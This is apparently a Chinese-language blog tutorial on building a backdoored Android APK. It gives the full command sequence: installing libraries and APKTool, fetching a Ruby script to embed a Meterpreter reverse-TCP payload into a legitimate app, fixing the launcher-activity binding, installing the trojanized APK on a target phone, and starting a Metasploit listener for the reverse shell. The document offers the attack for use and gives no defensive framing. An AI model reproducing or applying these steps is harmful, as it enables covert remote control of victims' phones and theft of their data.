AD

android后面APK文件制作

测试准备条件


安装各类库文件


apt-get install lib32stdc++6 lib32ncurses5 lib32z1


 安装APKTool

1.      准备合法的APK应用




2.      准备ruby脚本


https://gist.github.com/SkullTech/a62d106b55562cc1ab88 脚本与APK文件放入同一个目录



3.      执行命令


ruby apk-embed-payload.rb 0ne.apk -p android/meterpreter/reverse_tcp LHOST=8.8.8.8 LPORT=8899


其中8.8.8.88899是要反弹回来连接的公网IP及端口



4.      疑难解决


如果在step3执行过程中,脚本文件运行提示要bindAPK的某一个Activity上,切换到文件目录/root/original。


编辑器打开AndroidManifest.xml文件,寻找一个<activity> 同时包含 ‘.MAIN’ 和‘.LAUNCHER’的tag。找到后,寻找‘android:name’属性。


返回脚本提示窗口,根据查找到的Activity,输入对应的bind 号码。


如果以上步骤没有其他错误,将会在根目录生成一个“backdoored_0ne.apk”的文件。将该文件安装至目标手机即可。

 

5.      设置本地multi/handler监听


msfconsole


use multi/handler


set PAYLOAD android/meterpreter/reverse_tcp


set LHOST 8.8.8.8


set LPORT 8899


exploit

评论

此博客中的热门博文

简单粗暴导出小米便签

我——终于一个人了

Ubiquiti_Networks_UniFi_Cloud_Key_authed_rce